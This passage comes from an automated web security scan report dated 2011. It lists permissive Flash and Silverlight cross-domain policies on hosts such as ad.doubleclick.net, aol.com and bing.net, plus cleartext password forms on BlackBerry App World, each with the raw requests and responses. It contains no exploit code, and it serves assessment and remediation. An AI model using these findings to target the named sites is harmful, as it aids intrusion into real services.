Date: Thu, 05 May 2011 01:00:01 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
ETag: "249-4c227139-1010d51d"
Last-Modified: Wed, 23 Jun 2010 20:40:25 GMT
Content-Length: 585

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6.138. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:01 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1304592961283422; path=/; expires=Thu, 12-May-11 10:56:01 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 11:26:01 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.139. https://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:51:19 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1304599879651013; path=/; expires=Thu, 12-May-11 12:51:19 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 13:21:19 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.140. http://www.truveo.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 21:11:01 GMT
Accept-Ranges: bytes
Content-Length: 100
Access-Control-Allow-Oritin: *
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>


7. Silverlight cross-domain policy
There are 19 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 05 May 2011 00:56:58 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1363"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Thu, 05 May 2011 00:56:54 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

7.3. http://api.oscar.aol.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.oscar.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.oscar.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:31 GMT
Server: Apache
Last-Modified: Wed, 26 Aug 2009 19:46:35 GMT
ETag: "1398022-15c-47210b5623cc0"
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=1, max=83
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
<domain uri="http://*"/>
</allow-from>

...[SNIP]...

7.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 06 May 2011 00:56:23 GMT
Date: Thu, 05 May 2011 00:56:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.5. http://b.voicefive.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 06 May 2011 00:56:59 GMT
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.6. http://cdn.eyewonder.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "a683d7574fd1ca1:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 01:58:53 GMT
Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT
Expires: Thu, 05 May 2011 06:58:51 GMT
Content-Length: 268
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpath
...[SNIP]...

7.7. http://clk.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: image/gif
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://expapi.oscar.aol.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://expapi.oscar.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: expapi.oscar.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:58 GMT
Server: Apache
Last-Modified: Wed, 26 Aug 2009 19:46:35 GMT
ETag: "850019-15c-47210b5623cc0"
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=1, max=59
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
<domain uri="http://*"/>
</allow-from>

...[SNIP]...

7.9. http://metrics.apple.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:43:29 GMT
Server: Omniture DC/2.0.0
xserver: www113
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://o.aolcdn.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "d8baf0f1b81f70a7f23356194f1356bd:1219856443"
Last-Modified: Wed, 27 Aug 2008 17:00:43 GMT
Content-Type: application/xml
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 00:56:50 GMT
Date: Thu, 05 May 2011 00:56:50 GMT
Content-Length: 338
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.11. http://o.sa.aol.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:26 GMT
Server: Omniture DC/2.0.0
xserver: www92
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.12. http://s.stats.wordpress.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s.stats.wordpress.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Thu, 05 May 2011 00:59:32 GMT
ETag: "135-4d1c766b-100a6d00"
Last-Modified: Thu, 30 Dec 2010 12:09:15 GMT
Server: nginx
Content-Length: 309
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

7.13. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:41 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 12 May 2011 00:57:41 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.14. http://speed.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 00:56:56 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

7.15. http://sportingnews.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: sportingnews.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www24
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.16. http://stats.wordpress.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:00:01 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
ETag: "135-4c7e718e-f5f50"
Last-Modified: Wed, 01 Sep 2010 15:30:22 GMT
Content-Length: 309

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

7.17. http://www.aol.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.18. http://ts1.mm.bing.net/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Thu, 05 May 2011 01:00:32 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

7.19. http://ts2.mm.bing.net/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Thu, 05 May 2011 01:00:33 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8. Cleartext submission of password
There are 30 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://appworld.blackberry.com/webstore/content/13833

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/13833

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /webstore/content/13833 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86382
Date: Thu, 05 May 2011 10:52:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm4" name="deviceModalsForm4" method="post" action="/webstore/content/home.seam" class="awModalMessageForm" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm4" value="deviceModalsForm4" />
...[SNIP]...
<td><input id="deviceModalsForm4:inputPassword2" type="password" name="deviceModalsForm4:inputPassword2" value="" maxlength="32" onkeypress="userPin = $F('pin_list'); return enterKeyTrap(event, 'doDeviceChange(\'deviceChangeWindow\',\'' + userPin +'\',\'' + $F('deviceModalsForm4:inputPassword2') +'\')');" disabled="disabled" class="awChangeDevicePasswordField" /></td>
...[SNIP]...

8.2. http://appworld.blackberry.com/webstore/content/13833

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/13833

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /webstore/content/13833 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86382
Date: Thu, 05 May 2011 10:52:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm1" name="deviceModalsForm1" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm1" value="deviceModalsForm1" />
...[SNIP]...
<td><input id="deviceModalsForm1:inputPassword" type="password" name="deviceModalsForm1:inputPassword" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceAuthenticationWindow\',\'' + $F('deviceModalsForm1:inputPassword') + '\')');" /></td>
...[SNIP]...

8.3. http://appworld.blackberry.com/webstore/content/13833

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/13833

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /webstore/content/13833 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86382
Date: Thu, 05 May 2011 10:52:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm2" name="deviceModalsForm2" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm2" value="deviceModalsForm2" />
...[SNIP]...
<td><input id="deviceModalsForm2:inputPassword3" type="password" name="deviceModalsForm2:inputPassword3" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceInvalidPasswordWindow\',\'' + $F('deviceModalsForm2:inputPassword3') + '\')');" /></td>
...[SNIP]...

8.4. http://appworld.blackberry.com/webstore/content/19143

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19143

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /webstore/content/19143 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=37653
Date: Thu, 05 May 2011 13:02:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm4" name="deviceModalsForm4" method="post" action="/webstore/content/home.seam" class="awModalMessageForm" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm4" value="deviceModalsForm4" />
...[SNIP]...
<td><input id="deviceModalsForm4:inputPassword2" type="password" name="deviceModalsForm4:inputPassword2" value="" maxlength="32" onkeypress="userPin = $F('pin_list'); return enterKeyTrap(event, 'doDeviceChange(\'deviceChangeWindow\',\'' + userPin +'\',\'' + $F('deviceModalsForm4:inputPassword2') +'\')');" disabled="disabled" class="awChangeDevicePasswordField" /></td>
...[SNIP]...

8.5. http://appworld.blackberry.com/webstore/content/19143

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19143

Issue detail

